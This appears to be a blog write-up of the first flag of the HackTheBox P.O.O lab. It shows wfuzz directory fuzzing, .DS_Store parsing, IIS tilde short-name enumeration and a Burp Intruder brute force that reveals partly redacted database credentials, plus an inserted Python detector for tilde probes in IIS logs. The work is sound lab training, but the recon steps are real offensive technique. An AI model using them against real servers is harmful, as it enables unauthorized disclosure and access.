Since HTB started releasing insane machines back to back I've had a lot of free time. As I have now been working on 2 machines without success for the last 10 days, I decided to work on Endgame P.O.O, hence this article.
- PART 1: HackTheBox Endgame P.O.O Writeup Part 1 – Recon (Flag 01/05)
- PART 2: HackTheBox Endgame P.O.O Writeup Part 2 – Huh?! (Flag 02/05)
- PART 3: HackTheBox Endgame P.O.O Writeup Part 3 – BackTrack (Flag 03/05)
- PART 4: HackTheBox Endgame P.O.O Writeup Part 4 – Foothold (Flag 04/05)
- PART 5: p00ned (Coming soon)
P.O.O is a Windows Active Directory environment with a domain controller and a Microsoft SQL Server 2016. All you have is 2 open ports: HTTP on port 80 and SQL Server 2016 on port 1433. Working on P.O.O is a very realistic, real-life-like experience. As I like working on Windows-based machines, this is like a feast for me.
There are 5 flags you need to capture in the right order: Recon, Huh?!, BackTrack, Foothold and p00ned. As per the HTB machine intro, the goal is to compromise the perimeter host, escalate privileges and ultimately compromise the domain while collecting several flags along the way.
Let us start.
Enumeration
As a best practice, I always add the machine IP 10.13.38.11 to my /etc/hosts as poo.htb. It is easier to remember while scanning than the IP address.
NMAP SCANNING
I started off with a full port scan.
After nmap scanning I found a couple of open ports: 80/TCP running an IIS HTTPD server and port 1433 running Microsoft SQL Server. Nmap also revealed that the machine belongs to the Windows AD DC intranet.poo and that the computer's name is COMPATIBILITY.intranet.poo.
After scanning, I opened the website on the default HTTP port 80. It was just the IIS default website; nothing else I was able to find. So as the next step I decided to look for possible hidden directories that might help me enumerate further.
I used wfuzz to enumerate the directories using SecLists' all.txt wordlist.
wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ
Wfuzz discovered around 75 directories and files. Most of them are unreadable or 404. I was not able to list the PHP files as the file names were not clear. cURL didn't work either. The top result /admin/ needs credentials, so at this point I'm clueless.
# root @ ns09 in ~/htb/poo [17:35:03]
$ wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://poo.htb/FUZZ
Total requests: 43134
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000014: 401 29 L 100 W 1293 Ch "admin"
000000268: 301 1 L 10 W 146 Ch "uploads"
000000297: 301 1 L 10 W 145 Ch "themes"
000000358: 301 1 L 10 W 146 Ch "plugins"
000000398: 301 1 L 10 W 145 Ch "images"
000000504: 301 1 L 10 W 148 Ch "templates"
000000798: 200 50 L 156 W 10244 Ch ".DS_Store"
000001113: 301 1 L 10 W 146 Ch "widgets"
000003111: 301 1 L 10 W 147 Ch "META-INF"
000003114: 301 1 L 10 W 142 Ch "dev"
000003218: 200 31 L 55 W 703 Ch "????.txt"
000004923: 200 31 L 55 W 703 Ch "??"
000004924: 200 31 L 55 W 703 Ch "??.txt"
000005879: 400 6 L 26 W 324 Ch "%%45^45E^45E480CD%%index.tpl.php"
000006500: 200 31 L 55 W 703 Ch "????"
000006975: 400 6 L 26 W 324 Ch "%%F7^F7F^F7F34188%%header.tpl.php"
000007698: 400 6 L 26 W 324 Ch "%%0E^0E4^0E407559%%footer.tpl.php"
000008511: 301 1 L 10 W 151 Ch "New Folder"
000011402: 200 31 L 55 W 703 Ch "????.rar"
000011781: 400 6 L 26 W 324 Ch "%%6A^6A5^6A537DD8%%login.tpl.php"
000011782: 200 31 L 55 W 703 Ch "?????"
000012428: 200 31 L 55 W 703 Ch "???"
000012715: 200 31 L 55 W 703 Ch "?? ????.txt"
000013366: 200 31 L 55 W 703 Ch "????.html"
000014883: 200 31 L 55 W 703 Ch "??????.xls"
000016417: 200 31 L 55 W 703 Ch "???????.rar"
//-----SNIP------
Total time: 593.6598
Processed Requests: 43134
Filtered Requests: 43059
Requests/sec.: 72.65776
I started to look at each directory and file one by one until I noticed ".DS_Store". The .DS_Store (Desktop Services Store) is an Apple macOS system file that contains the information, attributes and metadata of the folder it belongs to. I know that a .DS_Store file can be parsed with several tools to disclose the information it contains.
A quick Google search showed me a couple of exploits and a HackerOne disclosure that exposed Twitter's internal network and Mac package information. The hacker took away a $560 bounty for this very simple find.
The exploits and articles I found:
- https://omespino.com/write-up-file-disclosure-via-ds_store-file-macos/
- https://miloserdov.org/?p=3867
- https://0day.work/parsing-the-ds_store-file-format/
- https://github.com/gehaxelt/Python-dsstore – exploit I used.
- https://github.com/lijiejie/ds_store_exp – exploit I used.
As the .DS_Store file is known for this major security flaw, I decided to concentrate more on the file instead of looking for more exploits.
With the first exploit I didn't get much information, so I tried the exploit called "ds_store_exp".
# root @ ns09 in ~/htb/poo [20:23:02]
$ python /root/ds_store_exp/ds_store_exp.py http://poo.htb/.DS_Store
[200] http://poo.htb/.DS_Store
[!] 'InvalidURL' object has no attribute 'code'
[!] 'InvalidURL' object has no attribute 'code'
[401] http://poo.htb/admin
[401] http://poo.htb/admin/.DS_Store
[200] http://poo.htb/Widgets/.DS_Store
[200] http://poo.htb/dev/.DS_Store
[200] http://poo.htb/JS/.DS_Store
[403] http://poo.htb/Templates
[403] http://poo.htb/Widgets
[200] http://poo.htb/Themes/.DS_Store
[403] http://poo.htb/JS
[403] http://poo.htb/dev
[!] 'InvalidURL' object has no attribute 'code'
[!] 'InvalidURL' object has no attribute 'code'
[403] http://poo.htb/Themes
[200] http://poo.htb/Images/.DS_Store
[403] http://poo.htb/Uploads
[200] http://poo.htb/iisstart.htm
[403] http://poo.htb/Plugins
[403] http://poo.htb/Images
[403] http://poo.htb/META-INF
[200] http://poo.htb/Widgets/Framework/.DS_Store
[403] http://poo.htb/Widgets/Menu
[200] http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/.DS_Store
[403] http://poo.htb/Widgets/Framework
[200] http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/.DS_Store
[403] http://poo.htb/Widgets/Notifications
[403] http://poo.htb/Widgets/CalendarEvents
[403] http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc
[403] http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1
[403] http://poo.htb/JS/custom
[403] http://poo.htb/Themes/default
[403] http://poo.htb/Images/buttons
[200] http://poo.htb/Widgets/Framework/Layouts/.DS_Store
[403] http://poo.htb/Images/icons
[200] http://poo.htb/Images/iisstart.png
[403] http://poo.htb/Widgets/Framework/Layouts
[403] http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/core
[403] http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/include
[403] http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db
[403] http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/src
[403] http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/core
[403] http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/include
[403] http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/db
[403] http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/src
[403] http://poo.htb/Widgets/Framework/Layouts/default
[403] http://poo.htb/Widgets/Framework/Layouts/custom
Found a lot of directories after running the second scanner, however most of them are restricted. There are a couple more .DS_Store files inside the directories, and after reading them they seem to contain the names of the files within the /dev/ directory.
After a long reading and understanding of the files within the dev/ directory I understood that the folder is somewhat related to IIS. A couple of posts in the HTB forums suggest there is an "infoleak vulnerability" which I couldn't find yet. At this moment I'm certain that the exploit point is IIS and the directories shown by the DS_Store exploit. But I can't see them yet.
After reading about IIS vulnerabilities, specifically "IIS unauthorized information disclosure" exploits, I concentrated my search on the "IIS short name vulnerability". This vulnerability is caused by the tilde character (~) used with the old DOS 8.3 name convention (SFN) in an HTTP request. It allows a remote attacker to disclose file and folder names (that are not supposed to be accessible) under the web root. (https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability)
An Acunetix article on the Microsoft IIS tilde directory enumeration vulnerability led me to an exploit on GitHub.
I downloaded the repository and started scanning the directories I had discovered using "ds_store_exp.py". This exploit scans the given URL, tries to exploit it and reveals real names. The script returns a message saying whether the server is vulnerable or not, based on the 404 or any restrictions IIS may have.
# root @ ns09 in ~/---/---- on git:master o [22:45:06]
$ python2 ---.py http://poo.htb/admin
# root @ ns09 in root @ ns09 in ~/---/---- on git:master o on git:master o [22:45:41]
$ python2 --.py http://poo.htb/admin/.DS_Store
# root @ ns09 in root @ ns09 in ~/---/---- on git:master o on git:master o [22:46:08]
$ python2 ---.py http://poo.htb/JS
[+] /JS/d~1.* [scan in progress]
[+] /JS/ds~1.* [scan in progress]
[+] /JS/ds_~1.* [scan in progress]
[+] /JS/ds_s~1.* [scan in progress]
[+] /JS/ds_st~1.* [scan in progress]
[+] /JS/ds_sto~1.* [scan in progress]
[+] /JS/ds_sto~1 [scan in progress]
[+] Directory /JS/ds_sto~1 [Done]
----------------------------------------------------------------
Dir: /JS/ds_sto~1
----------------------------------------------------------------
1 Directories, 0 Files found in total
# root @ ns09 in ---- on git:master o [22:46:40]
$ python2 --.py http://poo.htb/META-INF
Server is not vulnerable
# root @ ns09 in --- on git:master o [22:47:01]
$ python2 --.py http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc
[+] /dev/dca66d38fd916317687e1390a420c3fc/d~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/ds~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/ds_~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/ds_s~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/ds_st~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/ds_sto~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/ds_sto~1 [scan in progress]
[+] Directory /dev/dca66d38fd916317687e1390a420c3fc/ds_sto~1 [Done]
----------------------------------------------------------------
Dir: /dev/dca66d38fd916317687e1390a420c3fc/ds_sto~1
----------------------------------------------------------------
1 Directories, 0 Files found in total
# root @ ns09 in on git:master o [22:47:42]
$ python2 ---.py http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/core
# root @ ns09 in --- on git:master o [22:48:06]
$ python2 i--.py http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/include
# root @ ns09 in --- on git:master o [22:48:23]
$ python2 ---.py http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db
Server is vulnerable, please wait, scanning...
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/p~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/po~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_c~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.t* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.tx* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [scan in progress]
[+] File /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [Done]
----------------------------------------------------------------
File: /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt*
----------------------------------------------------------------
0 Directories, 1 Files found in total
# root @ ns09 in --- on git:master o [22:49:30]
$ python2 --.py http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/src
# root @ ns09 in -- on git:master o [22:51:01]
$ python2 --.py http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/core
# root @ ns09 in -- on git:master o [22:51:16]
$ python2 --.py http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/include
# root @ ns09 in -- git:master o [22:51:29]
$ python2 -- http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/db
Scanning....
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/p~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/po~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_c~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.t* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.tx* [scan in progress]
[+] /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt* [scan in progress]
[+] File /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt* [Done]
----------------------------------------------------------------
File: /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt*
----------------------------------------------------------------
0 Directories, 1 Files found in total
# root @ ns09 in ---- on git:master o [22:52:03]
$ --.py http://poo.htb/Widgets/Framework/Layouts/default
# root @ ns09 in -- on git:master o [22:52:27]
$ python2 --.py http://poo.htb/Widgets/Framework/Layouts/custom
After running and reading the results (I intentionally snipped the results and the script name) I saw that the only useful directory is "http://poo.htb/dev/304c0c90fbc6520610abbf378e2339d1/db". There is a file "/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt" with an incomplete name.
I tried for several minutes to test words starting with coxxxxxxxx.txt manually, but it seemed very difficult, so I decided to automate the process by brute forcing /dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt using Burp Suite.
I intercepted the request like below and made a list of words starting with "COxxxxxxx", combining them into a new wordlist for Burp Suite Intruder to brute force.
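Two things the session above relies on, shown as an added Python example (not code from this post or from the scanner it uses): how NTFS derives the 8.3 short name that a tilde probe reveals, which is why "poo_co~1.txt" means a name beginning with "poo_co", and how a defender can spot a run of such probes in IIS W3C logs. The log lines are constructed, the client IPs are placeholders, and the field order assumes the default IIS W3C layout.

```python
import re
from collections import Counter

# Characters allowed in an NTFS 8.3 short name; anything else becomes '_'.
LEGAL = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$%'-_@~`!(){}^#&")

def short_name(long_name: str, n: int = 1) -> str:
    """Simplified NTFS 8.3 derivation (assumption: collision index n is
    supplied by the caller; the hashed form NTFS uses after several
    collisions is not modelled)."""
    name = long_name.replace(" ", "")          # spaces are dropped outright
    base, _, ext = name.rpartition(".")
    if not base:                               # ".DS_Store": the whole name is the base
        base, ext = ext, ""
    base, ext = base.replace(".", "").upper(), ext.upper()
    safe_base = "".join(c if c in LEGAL else "_" for c in base)
    safe_ext = "".join(c if c in LEGAL else "_" for c in ext)
    canonical = f"{base}.{ext}" if ext else base
    # A name that already satisfies 8.3 is its own short name: no tilde form.
    if (canonical == long_name.upper() and safe_base == base
            and safe_ext == ext and len(base) <= 8 and len(ext) <= 3):
        return canonical
    short = f"{safe_base[:6]}~{n}"             # first 6 chars + ~n, ext cut to 3
    return f"{short}.{safe_ext[:3]}" if safe_ext else short

# Constructed IIS W3C log lines (default field order: date time s-ip cs-method
# cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer)
# sc-status sc-substatus sc-win32-status time-taken). 10.0.0.x are placeholders.
SAMPLE_LOG = """\
2019-04-01 22:48:23 10.13.38.11 GET /dev/dca66d38fd916317687e1390a420c3fc/db/p~1.* - 80 - 10.0.0.5 python-requests/2.21 - 404 0 0 12
2019-04-01 22:48:23 10.13.38.11 GET /dev/dca66d38fd916317687e1390a420c3fc/db/po~1.* - 80 - 10.0.0.5 python-requests/2.21 - 404 0 0 10
2019-04-01 22:48:24 10.13.38.11 GET /dev/dca66d38fd916317687e1390a420c3fc/db/poo~1.* - 80 - 10.0.0.5 python-requests/2.21 - 404 0 0 11
2019-04-01 22:48:30 10.13.38.11 GET /iisstart.htm - 80 - 10.0.0.9 Mozilla/5.0 - 200 0 0 8
2019-04-01 22:48:31 10.13.38.11 GET /Images/iisstart.png - 80 - 10.0.0.9 Mozilla/5.0 - 200 0 0 6
"""
TILDE_PROBE = re.compile(r"~[1-9]")            # 8.3 tilde sequence in the request path

def tilde_probes_by_client(log_text: str, threshold: int = 3) -> dict:
    """Count requests whose cs-uri-stem carries an 8.3 tilde pattern, per
    client IP, and return the clients at or above the threshold."""
    hits = Counter()
    for line in log_text.splitlines():
        if not line or line.startswith("#"):   # skip blanks and W3C directives
            continue
        fields = line.split()
        if len(fields) < 9:
            continue
        uri, client = fields[4], fields[8]
        if TILDE_PROBE.search(uri):
            hits[client] += 1
    return {ip: count for ip, count in hits.items() if count >= threshold}
```

Because a legitimate browser almost never requests a tilde path, even a low threshold on this counter is a usable alert, while the real fix is disabling 8.3 name creation on the volume so the short names do not exist to be probed.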
I set the payload position as below and started the attack using the default attack type.
And within a few minutes, the exact match "connection" appeared with status "200".
First Flag – Recon
Ok, here is the first flag of P.O.O, Recon.
SERVER=10.13.38.11
USERID=ext[-----------]ser
DBNAME=P[-------]C
USERPWD=#p00P[----------]s3r#
Flag : POO{fc[----------------]55}
The flag file also contains possible leads to the next step: a username, a SQL DB name and a password.
Thank you for reading, stay tuned for Part 2 "Huh?!".